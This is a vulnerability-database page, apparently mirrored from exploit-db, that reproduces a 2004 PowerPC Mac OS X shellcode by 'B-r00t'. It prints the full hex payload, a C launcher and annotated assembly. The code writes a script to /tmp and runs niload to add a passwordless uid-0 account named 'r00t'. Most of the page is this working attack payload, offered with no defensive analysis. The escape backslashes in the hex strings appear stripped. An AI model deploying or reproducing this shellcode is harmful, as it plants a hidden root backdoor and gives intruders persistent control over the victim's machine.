OSX/PPC – Add Root User (r00t) Shellcode (219 bytes)

OSX/PPC – Add Root User (r00t) Shellcode (219 bytes)

漏洞ID 1054646 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-OSX/PPC – Add Root User (r00t) Shellcode (219 bytes)-安全小百科CVE编号 N/A
图片[2]-OSX/PPC – Add Root User (r00t) Shellcode (219 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 OSX_PPC CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13480
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* 
PPC OS X / Darwin Shellcode by B-r00t. 2003.
open(); write(); close(); execve(); exit();
See ASM below.
219 Bytes!
*/

char shellcode[] =
"x7cxa5x2ax79x40x82xffxfdx7dx48x02xa6x3bxeax01x70"
"x39x60x01x70x39x1fxffx0dx7cxa8x29xaex38x7fxffx04"
"x38x80x02x01x38xa0xffxffx38x0bxfex95x44xffxffx02"
"x60x60x60x60x38x9fxffx0ex38xabxfexe5x38x0bxfex94"
"x44xffxffx02x60x60x60x60x38x0bxfex96x44xffxffx02"
"x60x60x60x60x7cxa5x2ax79x38x7fxffx04x90x61xffxf8"
"x90xa1xffxfcx38x81xffxf8x38x0bxfexcbx44xffxffx02"
"x60x60x60x60x38x0bxfex91x44xffxffx02x2fx74x6dx70"
"x2fx78x2ex73x68x58x23x21x2fx62x69x6ex2fx73x68x0a"
"x2fx62x69x6ex2fx65x63x68x6fx20x27x72x30x30x74x3a"
"x3ax39x39x39x3ax38x30x3ax3ax30x3ax30x3ax72x30x30"
"x74x3ax2fx3ax2fx62x69x6ex2fx73x68x27x20x7cx20x2f"
"x75x73x72x2fx62x69x6ex2fx6ex69x6cx6fx61x64x20x2d"
"x6dx20x70x61x73x73x77x64x20x2ex0a";

int main (void) 
{
        __asm__("b _shellcode");
}


/*
; PPC OS X / Darwin Shellcode by B-r00t. 
; open(); write(); close(); execve(); exit()
; Adds a user account (admin member) using a 
; '/tmp/x.sh shellscript (niload).
; echo 'r00t::999:80::0:0:r00t:/:/bin/sh' | /usr/bin/niload -m passwd . 
;
.globl _main
.text
_main:
        xor.    r5, r5, r5
        bnel    _main                    
        mflr    r10
	addi	r31, r10, 368
	li	r11, 368
        addi    r8, r31, -243
        stbx    r5, r8, r5
        addi    r3, r31, -252
        li      r4, 513
        li      r5, -1  
        addi    r0,  r11, -363
        .long   0x44ffff02
        .long   0x60606060
        addi    r4, r31, -242
        addi    r5, r11, -283
        addi    r0, r11, -364
        .long   0x44ffff02
        .long   0x60606060
        addi    r0, r11, -362
        .long   0x44ffff02      
        .long   0x60606060
        xor.    r5, r5, r5
        addi    r3, r31, -252          
        stw     r3, -8(r1)      
        stw     r5, -4(r1)      
        subi    r4, r1, 8       
        addi    r0, r11, -309             
        .long   0x44ffff02      
        .long   0x60606060
        addi    r0, r11, -367
        .long   0x44ffff02
path:   .asciz  "/tmp/x.shX#!/bin/shn/bin/echo 'r00t::999:80::0:0:r00t:/:/bin/sh' | /usr/bin/niload -m passwd .n"
*/

// milw0rm.com [2004-09-26]

相关推荐: Softrex Tornado WWW-Server File Disclosure Vulnerability

Softrex Tornado WWW-Server File Disclosure Vulnerability 漏洞ID 1100221 漏洞类型 Input Validation Error 发布时间 2003-05-28 更新时间 2003-05-28 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享